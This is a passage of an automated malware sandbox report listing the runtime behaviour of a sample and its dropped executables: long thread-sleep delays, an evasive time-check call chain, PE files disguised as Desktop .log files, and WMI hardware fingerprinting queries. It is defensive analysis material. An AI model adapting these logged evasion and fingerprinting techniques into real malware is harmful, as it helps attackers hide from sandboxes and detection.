                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 599872
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 599593
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 3600000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 598828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 598437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 597781
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 597203
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596843
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596609
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 596073
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595850
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595531
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 595156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594672
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594312
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 594000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 593656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 593156
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592859
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592437
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 592000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 591484
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 591160
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590937
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590562
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 590265
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 589828
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 589000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 588656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 300000
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 588343
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587859
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587577
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 587297
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586922
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 586234
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585656
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585487
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585359
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585247
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 585047
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584904
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584750
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584578
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584464
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584358
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584248
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 584138
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 583906
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeThread delayed: delay time: 583774
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1295Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1170Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1236
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1233
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1324
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1197
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1279
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1269
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1198
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1734
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1127
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1404
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1249
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1215
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1256
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1437
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1296
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWindow / User API: threadDelayed 9636
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZDjBezmV.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\DBQFDgRN.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\xIogbBMY.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\DjKnpLXK.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\FpiFczmJ.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\vBEPsorb.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\BkJolhdT.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\mUJprpRq.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\YBKLwVHY.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\amqbDjSR.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\pIbqPImn.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\tSxpUEMf.logJump to dropped file
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeDropped PE file which has not been started: C:\Users\user\Desktop\REWLTGNk.logJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exeDropped PE file which has not been started: C:\Users\user\Desktop\PVPluWhn.logJump to dropped file
                        Source: C:\Users\user\Desktop\OisrvsB6Ea.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23683
                        Source: C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe TID: 7980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6604Thread sleep count: 1295 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8792Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1196Thread sleep count: 1170 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6384Thread sleep count: 1236 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8812Thread sleep time: -11068046444225724s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1620Thread sleep count: 1233 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8832Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8528Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7520Thread sleep count: 1324 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8804Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8572Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 1197 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8800Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3340Thread sleep count: 1279 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8816Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8620Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4336Thread sleep count: 1269 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8480Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep count: 1198 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764Thread sleep time: -13835058055282155s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8612Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6072Thread sleep count: 1734 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8828Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep count: 1127 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8796Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8256Thread sleep count: 1829 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8836Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8592Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8296Thread sleep count: 1404 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8696Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8196Thread sleep count: 1249 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8820Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8280Thread sleep count: 1215 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8628Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8292Thread sleep count: 1256 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8788Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8688Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8368Thread sleep count: 1437 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8676Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8344Thread sleep count: 1296 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 8588Thread sleep time: -30000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -600000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -599872s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -599593s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 5812Thread sleep time: -32400000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -598828s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -598437s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -597781s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -597203s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596843s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596609s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596265s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -596073s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595850s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595531s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -595156s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594922s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594672s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594312s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -594000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -593656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -593156s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592859s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592437s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -592000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -591484s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -591160s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590937s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590562s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -590265s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -589828s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -589000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -588656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 5812Thread sleep time: -300000s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -588343s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587859s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587577s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -587297s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586922s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586578s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -586234s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585906s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585656s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585487s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585359s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585247s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -585047s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584904s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584750s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584578s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584464s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584358s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584248s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -584138s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -583906s >= -30000s
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe TID: 3384Thread sleep time: -583774s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 3888Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                        Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
